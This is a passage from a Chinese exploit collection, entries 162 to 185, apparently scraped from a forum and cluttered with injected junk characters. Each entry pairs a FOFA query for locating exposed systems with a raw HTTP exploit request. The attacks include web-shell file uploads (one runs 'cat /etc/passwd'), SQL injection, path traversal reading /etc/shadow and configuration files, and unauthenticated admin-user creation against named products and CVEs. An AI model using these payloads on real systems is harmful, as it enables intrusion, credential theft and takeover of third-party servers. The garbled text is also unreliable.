?/ s1 U& \" @9 g8 S2 P<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
R/ p3 e( K# `# `% C, L<tag>3</tag>) Q/ K$ _. L3 g' @3 O
</UploadResume>) P7 l" j* w# Y& k
</soap:Body>+ e7 [6 s& U8 W/ M4 s2 L" G
</soap:Envelope>3 o/ v9 \6 q! @# u! V2 P- k+ c
7 a; T/ p: B7 v# z" g6 [3 Y
) Z7 Q; } |1 c5 R4 O& U0 chttp://x.x.x.x/dizxdell.aspx
1 D& ]# i8 Q& J6 J; K
* d/ q% g, ~# U162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
% l& g! b% G( e/ G! y4 l3 x: FFOFA: app="和丰山海-数字标牌"9 g5 N! G+ Q, y W6 E! A, ]- H
POST /QH.aspx HTTP/1.1, s. e; v' G: W/ {1 C: o* C. I
Host: x.x.x.x
7 o9 D& K. c$ kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
& Z2 H1 o1 a& D% Y4 D; lConnection: close
6 @8 }" V' v0 x% i* LContent-Length: 583
5 H; A3 F( b% _4 ?, q3 uContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey9 o/ ~. b# c. e/ w; ~- R
Accept-Encoding: gzip
! H2 _- S0 c4 [ g# Z9 k
3 }! L) F) F1 A9 S! U' L3 A------WebKitFormBoundaryeegvclmyurlotuey
5 M* M6 R' I; z5 J" x- zContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"6 `8 i4 y( P& l- J i8 x
Content-Type: application/octet-stream9 q8 }- \6 g6 |7 |4 K
0 E3 q. e( F5 i: Y8 f<% response.write("ujidwqfuuqjalgkvrpqy") %>
- f9 k# `9 z0 v6 Y* N------WebKitFormBoundaryeegvclmyurlotuey) f/ Q# D& W- u1 Q# u
Content-Disposition: form-data; name="action"
, L, D5 }" a% }, {# y) J! @7 X) Y. Z3 L+ ]: p+ U1 J% R
upload U+ F5 i* r6 m7 A! {; j
------WebKitFormBoundaryeegvclmyurlotuey% y$ d, u$ ^8 \4 ]& T
Content-Disposition: form-data; name="responderId"
3 y4 I8 o `; K2 {& T+ G7 r' m( I) k5 e0 h1 @0 m+ [; H7 d! q
ResourceNewResponder
5 v7 B R3 K6 Y# h------WebKitFormBoundaryeegvclmyurlotuey
# x! p: }) J, i8 ]) i; WContent-Disposition: form-data; name="remotePath"
' D3 R" M# p1 t- |7 U7 ^* Z
7 J4 O5 N' Q& m( {/opt/resources
% S0 U3 _" y. g------WebKitFormBoundaryeegvclmyurlotuey--
# f% s2 p1 ^7 v2 k4 P3 }& G
: F. G4 s* S+ y! {% r' N7 k, {% v0 y0 {1 q/ _
http://x.x.x.x/opt/resources/kjuhitjgk.aspx: k+ n0 J0 C$ k |" m
( }# x1 }* M( n- ]5 a$ c163. 号卡极团分销管理系统 ue_serve.php 任意文件上传. B/ }4 z( S S @* \) X
FOFA: icon_hash="-795291075"$ Y5 C! D- L2 |+ C
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1) @7 E* J$ C7 y4 [' J8 g
Host: x.x.x.x$ R7 }) }& J9 X3 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36* E5 m' q7 Z2 R9 B8 V' j
Connection: close k1 x' r; k& l
Content-Length: 293
6 c5 e7 c: {( W) E* cAccept: */*
) R! Y# {" G8 h' c2 k" ^Accept-Encoding: gzip, deflate: L. }* s) F p ]+ M9 ^
Accept-Language: zh-CN,zh;q=0.9
! J1 Y" T, H; L2 BContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
& s, ^6 @5 a) _' U& t, [. u+ q0 R& G4 H5 R5 u! E5 q7 m
------iiqvnofupvhdyrcoqyuujyetjvqgocod: ? v" G6 Q2 l+ ~ w
Content-Disposition: form-data; name="name"( t( w% C# @; X1 q5 }
3 p/ x8 N: R$ K* `/ Q3 _$ \1.php& L0 w- Z' j+ Z; r" m
------iiqvnofupvhdyrcoqyuujyetjvqgocod
2 y3 A( s/ H3 g( k1 |Content-Disposition: form-data; name="upfile"; filename="1.php"2 x7 Q/ x5 X7 a" c6 N) n/ B& w) F
Content-Type: image/jpeg# n% {; m) }( F8 Z' G
7 i5 i# Z# y7 x+ c. i3 prvjhvbhwwuooyiioxega6 l4 p H" D1 ]$ N1 \/ Q
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
9 b" I X2 L+ o$ S8 F# E; }. I9 S# a% B& O. H7 b) E, p/ F
: ]1 Q! d7 r; o
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
$ }$ }7 s1 O% K N6 z5 kFOFA: title="智慧综合管理平台登入"% ?! W8 h) N Q+ B, O2 M5 u* U
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
9 X+ J3 m7 x F8 t6 O) G# n4 U: r9 EHost: x.x.x.x: |+ ~9 w+ I; h; V R. W# d# ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
; @9 H5 M1 i) e* R! c& U( W+ nContent-Length: 288+ N3 P4 C5 n8 X; R! E0 G7 e7 g
Accept: application/json, text/javascript, */*; q=0.014 x& s$ G, Y; M
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,8 M; |: {1 Q) {0 O
Connection: close
4 ]9 Q$ A0 {/ x4 d' rContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
: i8 e2 w3 Q9 g' {0 ?X-Requested-With: XMLHttpRequest" ^; Y+ x1 l, m3 u* U8 e; Y a$ ^
Accept-Encoding: gzip
0 c2 H% v: F3 R! t$ o: k4 H- ^( }' }5 v! d1 ]* E
------dqdaieopnozbkapjacdbdthlvtlyl+ T6 Y6 h; \! A
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"7 i' z# d! Z, \" {8 i
Content-Type: image/jpeg5 O# Y! ?5 v: s. E
' p0 b! L' s0 |; x
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
! _2 i# q& S2 o/ `------dqdaieopnozbkapjacdbdthlvtlyl--6 M9 ]* T5 C; {1 I
1 @/ `% L; }1 \1 U' h
0 J! O" \2 n) e" X+ o( J0 p& s
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx" Y- A5 H4 P7 r2 g' ^
. @% J2 F( J) C' y3 E165. OrangeHRM 3.3.3 SQL 注入$ W6 B: z+ n: f( D- q
CVE-2024-36428
& T( l7 y+ h0 e0 a" _, \' DFOFA: app="OrangeHRM-产品"
# w4 q2 i7 L0 ^) B( q' gURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
) p8 }* A3 N5 t, o4 s! [' h4 `2 C, X& c6 L1 B
, z* X1 Z* C8 r ?5 U9 D
166. 中成科信票务管理平台SeatMapHandler SQL注入
( ]# a9 H9 I5 x" ? wFOFA:body="技术支持:北京中成科信科技发展有限公司"
. n( e; _& ]: m; \& lPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
; V7 O. R9 | e7 AHost:
/ o; ~! d4 p; s; cPragma: no-cache
- b' m8 [9 x4 ^3 K+ eCache-Control: no-cache
- `. k' L8 R; Q5 F1 k4 |# MUpgrade-Insecure-Requests: 1
8 S# F% ?/ w+ Q, m& ?1 f' e9 G$ s. AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.363 v; f, L& T1 A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; U( B( @) U) I% u4 m; a5 k
Accept-Encoding: gzip, deflate6 b( v1 ^$ ~% @1 |9 a- q" t
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8+ B9 |% i( W7 d- l/ x: V
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
( ?4 h8 w [" D" H. G) }+ ]Connection: close L+ k, D( n/ c& _1 ]5 Z
Content-Type: application/x-www-form-urlencoded7 D* Z" _6 m2 I* U% v7 d: }# i
Content-Length: 89
, E! U. ?9 M5 ]- k
' n N& F* C" J5 \7 IMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE, `& k3 K5 C8 ? O" i& b/ c5 S
2 d& x& T4 x+ d1 |, `* q4 z5 J5 {# x+ l
7 K9 ^0 a+ ]8 A( |167. 精益价值管理系统 DownLoad.aspx任意文件读取0 Z6 _. |/ G1 c4 k% l
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"( Q* E# n2 E7 X0 Y
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
% e* ~6 M7 @) A7 p, [& wHost:- R6 N7 o. T a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
# P/ |1 ]* y% `$ V% {# Z4 {Content-Type: application/x-www-form-urlencoded
' W Y9 R9 \" {9 r) PAccept-Encoding: gzip, deflate
7 Q6 h* N) \3 H& }- R. E4 G; xAccept: */*: T7 R( J, U# C; J" J4 o
Connection: keep-alive% `, O0 \3 S4 K
7 U7 J/ u, f2 z: j% M$ X) H# p( R
! k: i3 ?+ e4 A6 s; p7 \& j2 N7 r2 C* l
168. 宏景EHR OutputCode 任意文件读取
$ o' }- c2 `- {* C- VFOFA:app="HJSOFT-HCM"/ v, |1 \* L) c) I* J
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
/ _( G6 n5 e2 U0 b& [9 fHost: your-ip6 l- s$ c0 L+ K7 \7 H9 W% H, G0 U: e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.363 u* R7 t- X( q/ u+ u* C' P
Content-Type: application/x-www-form-urlencoded. c9 C6 @, j+ v( x6 q# }3 M
Connection: close
' v- F+ C& @/ P( R* m3 r
6 v+ Z& ~* {$ c" p2 |, e9 @
1 M$ b6 s9 g |3 D
: n: d8 ]4 H8 w, O- o* \169. 宏景EHR downlawbase SQL注入
9 R ]2 p4 s' N9 s" dFOFA:app="HJSOFT-HCM"
- z6 }: E5 V: l$ LGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
" K4 a4 h0 o* dHost: your-ip1 G( }" O! q% A/ E3 T, r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. n1 o. [) t& n! h8 L
Accept: */*
: X9 e. z( T# M. n4 C" MAccept-Encoding: gzip, deflate
+ Z; f6 _2 i* F9 h* xConnection: close
3 [' M' V; Y" U; ]0 _% \5 |% g2 U5 p g1 n# n, Q& z9 e/ H3 G
" t! o: J# J+ Z$ j1 X3 K- C$ }! f% m) B; X3 j
170. 宏景EHR DisplayExcelCustomReport 任意文件读取6 `1 ~& c( d, h
FOFA:body="/general/sys/hjaxmanage.js"
; r+ B; `& |" ~2 p$ WPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1 x2 N0 U% I! p R8 K# r) Q# o
Host: balalanengliang
' Z4 N4 @0 _' {8 {User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, }3 Y' T, V2 ?# P( l4 W
Content-Type: application/x-www-form-urlencoded$ [2 M) V+ G) Z/ S4 v4 I4 z
" y7 o4 S0 l5 V
filename=../webapps/ROOT/WEB-INF/web.xml
: K+ R- T; V& F. l/ V" j* u2 i2 {3 Z" K% {- \9 L- V; A
3 Z& y4 [1 ?8 O2 |* @: h
171. 通天星CMSV6车载定位监控平台 SQL注入
6 X z0 B# |5 OFOFA:body="/808gps/"; Z9 \1 x! A m- m& I) Y' w5 y4 J
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
3 `7 _0 i4 Q% R2 F& S% y& fHost: your-ip* B+ @7 Z1 F9 W. V$ m* k8 n/ Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.06 j0 g6 p9 t( s$ p& a q
Accept: */*7 C$ A8 L+ {6 c! m# V- q. Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) t9 ~& j3 D% I6 ?5 M) V2 K! E& N4 K
Accept-Encoding: gzip, deflate1 k, V5 p1 w- z( u% v
Connection: close
9 ^+ d% P9 w$ f6 X: F0 \, Z% A
+ a8 @% @2 [% }" u. \' v2 x; g6 o$ p& I7 I7 a
3 T9 ~8 _* n f172. DT-高清车牌识别摄像机任意文件读取
, P* W0 s' F) o% P* P7 oFOFA:app="DT-高清车牌识别摄像机"
/ w' j, x, i: b- EGET /../../../../etc/passwd HTTP/1.1
* d; I+ _2 w2 KHost: your-ip* x7 Y: ]6 z8 l9 o2 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* @; t6 K6 z) Y, H; \7 N. Y4 h
Accept-Encoding: gzip, deflate$ f7 q$ B# ~* s' ^' e5 O
Accept: */*
$ W2 |3 r- @9 H( p. d+ \' hConnection: keep-alive
9 _% X, u# w6 C& I; P6 J, P! z1 n* r1 o1 B3 e2 C" S2 a
0 l! x, D. i( j: ^& @' }1 c
9 D$ {5 l4 @; y$ P9 M$ N- S( Z& Q173. Check Point 安全网关任意文件读取# W- O5 K5 r8 I* G( a7 v
CVE-2024-249199 N' ]6 g5 k7 L& O
FOFA:app="Check_Point-SSL-Network-Extender"! x7 @1 ^1 _& \3 l
POST /clients/MyCRL HTTP/1.1
v- D& Q% a$ L; eHost: your-ip) r ^& D \7 v9 o) e
Content-Type: application/x-www-form-urlencoded
4 J* r& I$ s+ J. m$ x l" \' V" T( k, V+ n: W/ s& L
aCSHELL/../../../../../../../etc/shadow4 ^. Q- C: y/ V; D* y; _% \
9 ~- Y: ?! R: }2 K* [
+ a5 e% c6 J: M4 w$ Y* X- R" }0 ] s% z& J$ B" m. a
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
9 c5 y) X) s) _ b6 N5 j7 d! ~9 p# ]FOFA:app="金和网络-金和OA"% u. _! @; Q8 r
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.16 P+ }$ t6 t7 ^( C4 m
Host: your-ip" G, f$ H2 {4 h% T) Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36: z; e" [+ P. x7 A( s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; b6 e. f9 h; c( s6 m+ p3 g3 @6 ~: O
Accept-Encoding: gzip, deflate, br& Q- Z3 A! S3 h3 n4 O" m) l: q
Accept-Language: zh-CN,zh;q=0.9, W. B1 `* p' ?) m) h+ {1 n
Connection: close4 I& E. E n. ]8 H7 d6 d0 s% J
$ T$ T* I7 \+ K- m9 \) H6 ]' s( b/ a" Q7 k. w
0 |9 m; ?) N% \6 ^: A
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
" T. S9 H8 z: vFOFA:app="金和网络-金和OA"
, h4 A2 F6 t$ k5 f, O3 }GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
! } t% K9 x) |- N" r* I7 VHost:, z7 o/ C, w, {9 R
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36$ G4 }( ~! H5 ?8 Q# t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; i3 O2 \0 q& sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 [ k; L& ~; a- P3 A GAccept-Encoding: gzip, deflate1 o# M9 h/ P7 D2 V9 e( K+ j o
Connection: close0 Y6 V8 S6 f* D* L3 a4 i H6 N
Upgrade-Insecure-Requests: 1; i& k" W0 P, [2 n. A) W
& p4 W' t0 C8 Q) [* j, u' C$ p5 ]! P
176. 电信网关配置管理系统 rewrite.php 文件上传
; V2 t5 T7 k+ i6 A- [FOFA:body="img/login_bg3.png" && body="系统登录"
; }1 I: O e: X# M" [2 t" dPOST /manager/teletext/material/rewrite.php HTTP/1.1
- b* {+ l; D/ H& `+ G7 r' e" w' e6 QHost: your-ip
" ~4 f* S H: B3 A7 y, fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0$ K# y. R/ J- e' W' W
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT& ]% V% b! r, l8 a
Connection: close5 N; Z7 d( E4 [, A0 H' i8 l4 m, w
4 _2 s2 t$ R& }------WebKitFormBoundaryOKldnDPT3 f9 w$ V1 N/ F8 _+ a
Content-Disposition: form-data; name="tmp_name"; filename="test.php"; W4 M5 u1 f% s, z6 g5 J( L/ i/ m5 t) u
Content-Type: image/png1 I" x: D" d8 O4 ^
/ l" l) r: r9 R+ u1 o<?php system("cat /etc/passwd");unlink(__FILE__);?>2 G: k# f, l7 }1 U H, X
------WebKitFormBoundaryOKldnDPT
5 ~6 x5 C/ [9 |% C4 xContent-Disposition: form-data; name="uploadtime"
1 o, b# X7 g0 |5 |+ F
( M6 F4 f5 L) ] % m" H6 z+ D9 B# q& ]% ]
------WebKitFormBoundaryOKldnDPT--
, w2 U) X+ [. Z7 H' j0 W# G3 a1 i, }& {- V, }+ Q, C
8 b* L' O3 g+ l9 ]" j/ K* c8 L/ |3 U3 q) G! v8 k
177. H3C路由器敏感信息泄露
8 [- `: C G/ ^/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg# @3 ] N1 o X8 }, l- ]% o
/userLogin.asp/../actionpolicy_status/../M60.cfg# o6 o, ^2 Z" E; `2 m3 I! d9 z! [
/userLogin.asp/../actionpolicy_status/../GR8300.cfg+ g7 I' Z2 E% U; ]
/userLogin.asp/../actionpolicy_status/../GR5200.cfg/ j$ t0 G+ `. Y' u
/userLogin.asp/../actionpolicy_status/../GR3200.cfg- O V& x! A" y8 r
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
4 K0 p6 ~) g3 T+ z. }/ g/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
: X: _3 H5 P$ f8 g4 C( |2 O+ O. t/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg" {. `8 P5 J5 v2 G7 ?) E6 {5 V( `
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
' N9 M# D' L+ a# K/ ]+ P/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg! @) G: J0 N, B+ o" d
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
5 D* V$ ?3 A4 g" q" d% w/userLogin.asp/../actionpolicy_status/../ER5100.cfg
- R1 S. X F- [/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg0 g J1 U8 h, `+ f |
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
' z, s6 D" u# q h5 N5 j! Z0 I/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
2 Z+ Q7 t# z- u" A/userLogin.asp/../actionpolicy_status/../ER3200.cfg# z5 p! M: s' L8 T* n7 d/ i! j
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg* H, {3 h) c0 v5 h; [
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
: ^! q* D1 G8 Q/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg8 K% A$ Z t( G1 [- w1 e! s! ~
/userLogin.asp/../actionpolicy_status/../ER3100.cfg) _3 O9 ?$ p/ a
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
' Y6 j3 K9 q3 d# Y- }0 c6 d7 U+ ^( H2 a
: J2 P2 d+ }+ j- k4 J$ W
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
B/ ~8 [3 J; E( a9 b( MFOFA:header="/selfservice"
6 B" m+ y/ c fPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1$ j3 k+ _' V8 z2 ?6 u" J
Host:
. h" T6 n5 K T7 j% VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.367 H. U, G, ]+ i0 Z
Content-Length: 2528 W1 Q+ C+ n R, @5 \ c
Accept-Encoding: gzip, deflate
$ g+ R1 P" x2 rConnection: close- A5 G1 j* D: n8 P' \( [6 |
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l/ @' V. [; M- f
-----------------aqutkea7vvanpqy3rh2l
7 m# V; j0 ?4 b+ PContent-Disposition: form-data; name="12234.txt"; filename="12234"5 x }5 e) z9 E9 X3 W
Content-Type: application/octet-stream7 Q6 K4 W% x4 y0 C. T$ M h
Content-Length: 255' i" p8 q, P5 J/ Y1 r
9 ?. x1 J3 W {2 V$ T% K
12234
8 H& U+ e9 d8 i+ Q-----------------aqutkea7vvanpqy3rh2l--
) \; L/ j- D4 J
' ]: j- j& \& A: o& K5 j% i8 M3 e# V- o( t2 K
GET /imc/primepush/%2e%2e/flex/12234.txt
5 `; a, c1 u g# q+ O4 k% E$ ]( E* G! S
" ^% s' Q1 B$ C1 R1 {9 c
179. 建文工程管理系统存在任意文件读取; C" V1 Z) Q) j7 @
POST /Common/DownLoad2.aspx HTTP/1.1
; v/ W# A3 s& o: R: L) `1 ]Host: {{Hostname}}
5 {* T8 V; ^& s2 KContent-Type: application/x-www-form-urlencoded% k& g6 M0 ?$ l% J! M
User-Agent: Mozilla/5.0
/ t% ?/ P3 ]& i: q$ A- u' J6 G) E8 J+ D! u
path=../log4net.config&Name=
- h5 k+ m2 q" u2 c7 T( f: n7 y4 u
0 Z/ w7 V2 M- J, \2 ~# c
[ u% `* D" O% q( T& T4 r7 z" Y. d180. 帮管客 CRM jiliyu SQL注入
8 G( z* W' Q9 ^1 gFOFA:app="帮管客-CRM"
1 ~1 D5 c7 o1 \2 lGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
6 }. o/ {' {4 Y: Y% y' e% XHost: your-ip, f5 h) i( A2 s# k3 W9 H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
% @5 e) |. g' x- N# q0 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, x) X; n( J7 }6 B8 JAccept-Encoding: gzip, deflate
7 R+ O0 L( D; Z: t5 L' S% qAccept-Language: zh-CN,zh;q=0.9
$ g' b2 I/ Y: D% E9 _' B, `! ~Connection: close t) ~2 V$ s) l7 g( v
: I1 R$ o+ u7 b9 j% `: p
) K5 H6 j. B1 }6 s181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入; S, ]+ W% T/ a/ _/ d5 O' E
FOFA:"PDCA/js/_publicCom.js"
/ `6 Z0 s0 m" _POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
5 o: e" V) P- i+ m, z: e, Z/ |* MHost: your-ip: \' X+ J6 C! _8 X2 r; y' ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36# W6 W4 v6 V% l0 q, Y& w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- r3 D8 Z. \" p& q$ H( E6 JAccept-Encoding: gzip, deflate, br
/ s. F. i" g) g1 \- xAccept-Language: zh-CN,zh;q=0.9, ?. b8 p! K" m0 M/ g
Connection: close# I5 a' m0 T, S4 o
Content-Type: application/x-www-form-urlencoded3 }' @1 ~; x' l- w, V. c- V: b6 O
+ c, D. H3 x$ g6 P) q6 |; {* w1 I/ s8 ~4 t: e& l
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=201 H3 O% Y" z+ C" M8 p, r
. U1 T) R5 T2 Z
1 X5 k/ U3 O+ {: B. W) ^
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
1 l, Q0 O! x8 A$ k7 iFOFA:"PDCA/js/_publicCom.js"( G( r+ Y1 _6 a$ s s
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
$ [2 B: L- c( t4 _Host: your-ip
" m4 f6 a- o" F! Y. H; I1 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
& \% c3 i% o+ J k2 p$ uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 C: F( y0 a* {" t% j
Accept-Encoding: gzip, deflate, br
; ^- r# M, b0 O+ d+ u' M1 Z- SAccept-Language: zh-CN,zh;q=0.9. j4 _5 ^1 @9 T9 F- \7 l/ o
Connection: close
% A% e$ f2 _9 M% lContent-Type: application/x-www-form-urlencoded
! b9 C. d, J/ m# {3 m9 }% \( M; H% b- w/ T" _) f. j
3 g4 V: X# m! A) Y) d4 h% i( qusername=test1234&pwd=test1234&savedays=1
" e- z; x+ U8 _7 Y. ?) c' j# I* i- n6 U) F
# e. b B: u) B" D183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入3 Z3 }. ^$ T0 e3 g
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"+ g+ x: r" g9 z9 K3 ]
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.14 L) p7 t. X0 `6 j( [( a% m: l
Host: your-ip0 s( b; ~7 X# \, A. C1 s6 E9 l
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36$ w# I" p+ D7 x+ ^( H
Accept-Charset: utf-8
P+ t a8 ?1 B7 L8 K# f0 a* ]* HAccept-Encoding: gzip, deflate, z% @' @0 R" s: {
Connection: close0 d& R" V$ g1 B& Y0 F" X
! o; E- H) T" I( l7 c1 F
5 {0 f4 X$ r/ V
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加* h) }) m$ r5 m( U0 y3 c: F; D2 j8 O4 V
FOFA:server="SunFull-Webs"
: f/ U. H/ h( t( `POST /soap/AddUser HTTP/1.1
# p- D! F! a T+ U- M, v2 XHost: your-ip
1 y% x! S- {# v uAccept-Encoding: gzip, deflate1 t: m+ c. f0 [% r! \* F% i/ \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.07 S4 [3 T3 D- s2 B% W- F
Accept: application/xml, text/xml, */*; q=0.01. {1 [* s% \+ }1 G
Content-Type: text/xml; charset=utf-89 A: Q4 X7 L9 A0 I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
?# e, Y' Z5 d0 E; \( `6 z: XX-Requested-With: XMLHttpRequest
$ X( |0 A: @" V; ~# D$ X
" E4 Y6 s/ a4 o5 u% c& r) u1 G( x
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
$ d; U( |$ i3 s5 N+ j1 x, E- |. i1 P( y( x; R) E
% I) `8 T& E# Q; N8 w185. 瑞友天翼应用虚拟化系统SQL注入
1 o/ N6 E6 I2 S' d/ b- Pversion < 7.0.5.1
0 m# W+ T2 Q% Z' h ~% Q! \: lFOFA:app="REALOR-天翼应用虚拟化系统"9 c4 m; b! {& G/ ?
